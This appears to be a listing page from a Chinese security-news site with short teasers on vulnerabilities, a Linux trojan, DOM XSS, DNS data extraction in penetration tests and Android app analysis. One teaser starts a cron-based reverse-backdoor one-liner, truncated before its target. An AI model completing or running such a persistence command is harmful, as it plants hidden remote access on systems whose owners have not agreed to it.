做项目的时候,需要实现这样一个功能:弹出一个窗口,对该窗口进行操作,操作结束后关闭该窗口,对父窗口进行刷新操作;纠结了小一会儿呢.查了一下资料,然后自己实践一下,成功了,下面将我查到的资料分享一下吧;...
一条命令实现无文件兼容性强的反弹后门
最好用一个不常见的用户执行,任务写入/var/spool/cron/$username (crontab -l;echo '*/60 * * * * exec 9<> /...
漏洞分享
CVE-2015-0393:Oracle发布严重安全漏洞预警
疑似后门:漏洞CVE-2015-0393江湖人称“Oracle漏洞猎手”的David Litchfield在去年6月11日发现过Oracle一个疑似后门的严重漏洞CVE-2015-0393。日前Lit...
苹果OS X的Spotlight文件搜索含泄漏用户隐私漏洞
德国的科技新闻网站Heise近日报道称苹果最新版桌面操作系统OS X 10.10(Yosemite 优胜美地)提供的Spotlight文件搜索功能含有可能泄露用户资料的漏洞。美国IDG News的测试...
可感染Linux平台的最新木马XOR.DDoS
一种名为“XOR.DDoS”的新型木马出现,该木马能够感染32位和64位的Linux系统,通过安装rootkit来隐藏自身,并可通过DDoS攻击形成僵尸网络。XOR.DDoS木马原理杀毒软件公司Ava...
WEB安全
技术分享:如何利用Dominator发现诺基亚(Nokia)官网的DOMXSS
背景DOM型XSS(跨站脚本)漏洞一般较难于发现,本文中作者使用Dominator来发现并利用一个诺基亚(Nokia)OVI官网的DOMXSS,这让我想起了二哥的那个神器:)简述去年,作者发现并报告了...
网络安全
如何在渗透测试中利用BASH和DNS下载数据
在渗透测试过程中,拿到服务器权限之后从服务器下载数据是一件比较费劲的事情,因为服务器一般都有防火墙在前面挡着。防火墙一般都会禁止服务器对外建立连接,这种情况下使用DNS来下载数据是一种行之有效的方法,...
移动安全
对时下流行的Android应用加固技术分析
我是一名奋战在安全第一线的程序猿,爱好和平,爱好打包不平,FreedomForever!最近移动安全太火,火的我都忍不住玩了一把,最近几个月在研究各家的安全加固方案,大多dex加密、反调试等技术,玩着...
移动安全
使用调试器对安卓APP进行安全测试
在这篇博文中,我将带领大家学习如何将调试器应用到一个Android应用程序上,并利用第一次反编译得到的信息来分析应用的方法调用过程。比较独特的一点是,本方法并不需要获取安卓设备的root权限。 该方法...
移动安全
研究人员发现一种利用Siri窃取苹果iPhone/iPad数据
研究人员最近发现一种屌炸天的攻击方法:利用苹果iOS语音服务Siri,结合信号处理中的隐写术原理,可以从越狱的iPhone和iPad中悄悄窃取数据并上传到远程服务器。 意大利国家研究委员会的LucaC...
